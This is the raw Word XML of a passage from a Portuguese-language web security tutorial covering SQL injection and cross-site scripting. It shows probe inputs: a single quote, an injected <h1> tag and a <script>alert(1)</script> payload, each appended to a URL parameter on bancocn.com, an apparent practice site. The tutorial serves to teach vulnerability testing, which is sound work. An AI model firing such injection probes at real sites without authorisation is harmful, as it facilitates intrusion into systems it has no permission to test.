        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5D4F6A" w14:textId="16E9CC0C" w:rsidR="006D4F3F" w:rsidRPr="00B007BE" w:rsidRDefault="006D4F3F" w:rsidP="00B007BE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc156597600"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="28141F87" w14:textId="77777777" w:rsidR="00E957A6" w:rsidRPr="00711C8C" w:rsidRDefault="00E957A6" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC6AE35" w14:textId="51A84660" w:rsidR="00E957A6" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC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Quando se carrega uma imagem, ou tem um formulário, geralmente há um banco de dados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9FCA0" w14:textId="77777777" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA76F1B" w14:textId="70301FA4" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC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Se no formulário ou a URL que busca as informações no banco de dados não forem tratados no back-end, ao passar uma aspas simples </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, vai gerar um erro</w:t>
      </w:r>
      <w:r w:rsidR="00DC4F22" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751532B5" w14:textId="56D2CB07" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA55C7E" w14:textId="6CF0C4DC" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC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Exemplo: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://www.bancocn.com/cat.php?id=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A47674" w14:textId="59934FF9" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43ECE657" w14:textId="724D78DC" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC" w:rsidP="00711C8C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lastRenderedPageBreak/>
        <w:t>A resposta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810A17A" w14:textId="3774ADB0" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="006D4F3F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/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16374374" wp14:editId="12381999">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>58863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5265722" cy="2903146"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1162645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588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722" cy="2903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381B3" w14:textId="11139C1E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22806684" w14:textId="56BD4E60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6A77AAEE" w14:textId="77777777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73E0F190" w14:textId="77777777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74AB7CB3" w14:textId="77777777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1B4649CD" w14:textId="77777777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32B95742" w14:textId="77777777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631DA887" w14:textId="77777777" w:rsidR="005635CC" w:rsidRDefault="005635CC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44ACBCA2" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEC7E31" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2970E30A" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1AEB42" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFE5A00" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007F456B" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B444F56" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777C0BB6" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AEEB67" w14:textId="77777777" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="005635CC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2238DA2C" w14:textId="77777777" w:rsidR="006D4F3F" w:rsidRPr="00711C8C" w:rsidRDefault="006D4F3F" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64C134BE" w14:textId="0D3AC233" w:rsidR="005635CC" w:rsidRPr="00711C8C" w:rsidRDefault="00DC4F22" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/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</w:rPr>
        <w:t>A gente percebe que isso é um erro de consulta SQL, ele tenta fazer uma consulta ao banco de dados e ao colocar as aspas simples, ele quebra a string de consulta.</w:t>
      </w:r>
      <w:r w:rsidR="00A23A24" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resumidamente: </w:t>
      </w:r>
      <w:r w:rsidR="00A23A24" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Está vulnerável a SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E667C" w14:textId="77777777" w:rsidR="005F5D01" w:rsidRPr="00711C8C" w:rsidRDefault="005F5D01" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E28109" w14:textId="3C7D1D85" w:rsidR="000D10DC" w:rsidRPr="000D10DC" w:rsidRDefault="005F5D01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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obs: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Se não conseguisse quebrar a query de consulta, não retornaria nenhum erro.</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7187C07E" w14:textId="77777777" w:rsidR="002D3B03" w:rsidRDefault="002D3B03" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420EE034" w14:textId="77777777" w:rsidR="000D10DC" w:rsidRPr="00711C8C" w:rsidRDefault="000D10DC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1B4A39" w14:textId="50838A3D" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="002D3B03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Na mensagem de erro, quando é inserido qualquer valor na query, é retornado na mensagem de erro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2FAE8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17FE0F37" w14:textId="77777777" w:rsidR="002D3B03" w:rsidRDefault="002D3B03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/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653CE445" wp14:editId="147700B8">
            <wp:extent cx="3955312" cy="2221596"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="539067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769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260" cy="222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DFF1" w14:textId="77777777" w:rsidR="000D10DC" w:rsidRPr="00711C8C" w:rsidRDefault="000D10DC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2987C616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59035BC1" w14:textId="089A7BB0" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="002D3B03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Para verificar se a string é retornada na página de forma segura, eu posso colocar </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tags</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CA1EA6" w14:textId="1669ECBE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5408F145" w14:textId="0F39AAEC" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="002D3B03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Exemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669643F3" w14:textId="12B9D593" w:rsidR="002D3B03" w:rsidRDefault="00000000" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="002D3B03" w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://www.bancocn.com/cat.php?id=2’&lt;h1&gt;Ola&lt;/h1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002D3B03" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6115BD" w14:textId="77777777" w:rsidR="000D10DC" w:rsidRDefault="000D10DC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C06FF4" w14:textId="77777777" w:rsidR="000D10DC" w:rsidRDefault="000D10DC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635BFD9E" w14:textId="77777777" w:rsidR="000D10DC" w:rsidRPr="00711C8C" w:rsidRDefault="000D10DC" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5651FCD7" w14:textId="3FD804FC" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="002D3B03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lastRenderedPageBreak/>
        <w:t xml:space="preserve">A resposta será: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED9F57" w14:textId="0E6EBF7C" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="002D3B03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/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51198AC5" wp14:editId="49B4AAD9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>93212</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2753360" cy="2099310"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21365"/>
                <wp:lineTo x="21520" y="21365"/>
                <wp:lineTo x="21520" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="541368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6833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8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3D86C" w14:textId="2D75774E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4DD16E11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404E3FEC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681C3B8E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22B230CE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107CDFDF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5741C73C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3F266F81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009381AC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48AA5BF8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215C4563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564D8D6B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788D3FFD" w14:textId="77777777" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="002D3B03" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795CB2CC" w14:textId="4208A3C2" w:rsidR="002D3B03" w:rsidRPr="00711C8C" w:rsidRDefault="003E02C8" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/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</w:rPr>
        <w:t xml:space="preserve">Esse conteúdo do parâmetro que está sendo mostrado na página, está sendo mostrado de forma insegura, </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ele não está mostrando como um texto, ele está inserindo o texto diretamente no HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8DA082" w14:textId="77777777" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D56602" w14:textId="613BEFB4" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21" w:rsidP="00B007BE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc156597601"/>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="194E8963" w14:textId="77777777" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFAF9E9" w14:textId="77777777" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21" w:rsidP="003C1C21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O Cross-Site Scripting (XSS) é uma vulnerabilidade de segurança na qual um invasor injeta código malicioso (geralmente JavaScript) em páginas web visualizadas por outros usuários. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F29608" w14:textId="77777777" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21" w:rsidP="003C1C21">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BB252B" w14:textId="77777777" w:rsidR="003C1C21" w:rsidRDefault="003C1C21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Esse código é então executado no navegador do usuário, permitindo que o atacante realize várias ações, como roubo de cookies de sessão, redirecionamento do usuário para sites maliciosos, ou até mesmo realização de ações em nome do usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47551E6D" w14:textId="77777777" w:rsidR="00BF5FA7" w:rsidRPr="00711C8C" w:rsidRDefault="00BF5FA7" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B51A8D4" w14:textId="180303F2" w:rsidR="003E02C8" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21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Aproveitando o exemplo acima, então, de certa forma, provavelmente, você consegue inserir código HTML e provavelmente consegue inserir código JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C6C27" w14:textId="77777777" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F550A83" w14:textId="3AD3F460" w:rsidR="003C1C21" w:rsidRPr="00711C8C" w:rsidRDefault="003C1C21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 xml:space="preserve">Exemplo: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00CE62D1" w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://www.bancocn.com/cat.php?id=2’&lt;script&gt;alert(1)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CE62D1" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E7B6EA" w14:textId="77777777" w:rsidR="00521F07" w:rsidRPr="00711C8C" w:rsidRDefault="00521F07" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67DB6E70" w14:textId="698509FF" w:rsidR="00521F07" w:rsidRPr="00711C8C" w:rsidRDefault="00521F07" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obs: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> O código ele é injetado e executado no navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C80852" w14:textId="2AC0D998" w:rsidR="00521F07" w:rsidRPr="00711C8C" w:rsidRDefault="00521F07" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">SQL Injection </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> O código é injetado no back-end, no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9658EF" w14:textId="77777777" w:rsidR="00CE62D1" w:rsidRPr="00711C8C" w:rsidRDefault="00CE62D1" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C903D2A" w14:textId="32CC1C3D" w:rsidR="00CE62D1" w:rsidRPr="00711C8C" w:rsidRDefault="00CE62D1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Resposta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9755B" w14:textId="77777777" w:rsidR="00CE62D1" w:rsidRPr="00711C8C" w:rsidRDefault="00CE62D1" w:rsidP="00805CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8717E0" w14:textId="69C0AA89" w:rsidR="00CE62D1" w:rsidRPr="00711C8C" w:rsidRDefault="00CE62D1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/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F5B3E6F" wp14:editId="71543337">
            <wp:extent cx="4667693" cy="1859063"/>
